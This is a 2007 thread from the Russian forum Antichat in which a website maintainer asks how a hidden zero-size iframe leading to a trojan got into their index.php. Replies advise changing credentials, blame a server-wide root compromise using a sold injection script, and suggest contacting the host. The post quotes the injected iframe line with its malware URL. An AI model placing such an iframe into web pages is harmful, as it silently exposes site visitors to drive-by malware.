ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Взлом сайта, причины
  #1  
Старый 19.01.2007, 11:13
Аватар для Generic54
Generic54
Новичок
Регистрация: 19.01.2007
Сообщений: 6
Провел на форуме:
17516

Репутация: 0
По умолчанию Взлом сайта, причины

Я здесь новичок, поэтому прошу сразу не пинать меня.
Где-то с месяц назад, на одном из сайтов, кот. я поддерживаю обнаружил в index.php строку
Код:
<!--iframe width="0" height="0" src="http://eburgertry.info/st/sp/sp.php"></iframe-->
акуратно по ссылке троян
Поняв что сайт был взломан, я из бекапа восстановил индексный файл. Проблема повторялась подря 3 дня. Не понимал, где дырка (индексу не передавались никакие параметры, был тока вывод данных из mySQL). Потом проблема исчезла, причем никаких изменений я в скрипт не вносил.

Сегодня рыскал в инете и случайно наткнулся на сайт:
http://www.sadkamney.ru/
где походу та же проблема.

Подскажите плиз, знающие люди, где косяк. Каким образом вообще в index.php можно вставить тег. Дайте линки, где об этом почитать можно.
Еще раз просьба сильно не пинать

зы Да у меня лично register_global=off и разрешения на файлы(в том числе на index.php) стоит 644
 
Ответить с цитированием

  #2  
Старый 19.01.2007, 11:40
Аватар для Raz0r
Raz0r
Участник форума
Регистрация: 07.01.2007
Сообщений: 259
Провел на форуме:
309455

Репутация: 41
По умолчанию

При доступе к файлам конечно, ты поди сам уже протроянен, на одном из моих сайтов было так-же когда меня протроянили...
Да, и не забудь сменить пароли к сайту, FTP, cpanel, etc...
 
Ответить с цитированием

  #3  
Старый 19.01.2007, 12:00
Аватар для Generic54
Generic54
Новичок
Регистрация: 19.01.2007
Сообщений: 6
Провел на форуме:
17516

Репутация: 0
По умолчанию

Цитата:
Сообщение от Raz0r  
При доступе к файлам конечно, ты поди сам уже протроянен, на одном из моих сайтов было так-же когда меня протроянили...
Да, и не забудь сменить пароли к сайту, FTP, cpanel, etc...
Спасибо. А как правильно выставить досту к файлам? И вообще где можно прочитать про такого рода взлом сайта.
зы да троянец я этот словил на лок. машину, он заменяет IE
 
Ответить с цитированием

  #4  
Старый 19.01.2007, 12:49
Аватар для злюка
злюка
Постоянный
Регистрация: 11.11.2005
Сообщений: 317
Провел на форуме:
2848854

Репутация: 409
Отправить сообщение для злюка с помощью ICQ
По умолчанию

Цитата:
Сообщение от Generic54  
Спасибо. А как правильно выставить досту к файлам? И вообще где можно прочитать про такого рода взлом сайта.
зы да троянец я этот словил на лок. машину, он заменяет IE
вот смотри, что тут продают _http://forum.antichat.ru/thread24250-iframe.html, возможно тебя никто не ломал и не троянил, получили рута на серваке и с помощью скрипта вставили iframe на все сайты хостинга.
 
Ответить с цитированием

  #5  
Старый 19.01.2007, 13:04
Аватар для Generic54
Generic54
Новичок
Регистрация: 19.01.2007
Сообщений: 6
Провел на форуме:
17516

Репутация: 0
По умолчанию

Цитата:
Сообщение от злюка  
вот смотри, что тут продают _http://forum.antichat.ru/thread24250-iframe.html, возможно тебя никто не ломал и не троянил, получили рута на серваке и с помощью скрипта вставили iframe на все сайты хостинга.
Походу это именно оно...
Если я правильно понял работу скрипта, мне достаточно, поставить атрибуты на все файлы(в том числе и индекс) 444, то есть read, и проблема решена? Или нет?
Доступ на сайт только по ftp естественно по правам рута. Никаких скриптов с записью в индекс и в другие файлы нет.
То есть права рута, насколько я понимаю, тока у юзера, который ходит по ftp. Поставив атрибуты на файлы 444 и поменяв пароль на фтп, проблема должна исчезнуть?
 
Ответить с цитированием

  #6  
Старый 19.01.2007, 13:29
Аватар для Generic54
Generic54
Новичок
Регистрация: 19.01.2007
Сообщений: 6
Провел на форуме:
17516

Репутация: 0
По умолчанию

Никто не вкурсе как от этого защититься?
 
Ответить с цитированием

  #7  
Старый 19.01.2007, 13:36
Аватар для Raz0r
Raz0r
Участник форума
Регистрация: 07.01.2007
Сообщений: 259
Провел на форуме:
309455

Репутация: 41
По умолчанию

Generic54, если имеют права рута, то хоть 0 ставь - не поможет...
 
Ответить с цитированием

  #8  
Старый 19.01.2007, 13:38
Аватар для злюка
злюка
Постоянный
Регистрация: 11.11.2005
Сообщений: 317
Провел на форуме:
2848854

Репутация: 409
Отправить сообщение для злюка с помощью ICQ
По умолчанию

поэтому пиши письмо хостёру..пущай смотрит логи..может чего там и увидит левого.
 
Ответить с цитированием

  #9  
Старый 19.01.2007, 13:40
Аватар для Generic54
Generic54
Новичок
Регистрация: 19.01.2007
Сообщений: 6
Провел на форуме:
17516

Репутация: 0
По умолчанию

Цитата:
Сообщение от злюка  
поэтому пиши письмо хостёру..пущай смотрит логи..может чего там и увидит левого.
ОК, спасибо всем. Будем смотреть
 
Ответить с цитированием

  #10  
Старый 19.01.2007, 14:58
Аватар для guest3297
guest3297
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
Провел на форуме:
3887520

Репутация: 2996


По умолчанию

Ифрейм трафик...
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Взлом сайта Dimann Болталка 9 11.02.2005 07:53
Взлом сайта. Для начаниющих kyzmi4 Болталка 25 20.12.2004 18:45



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ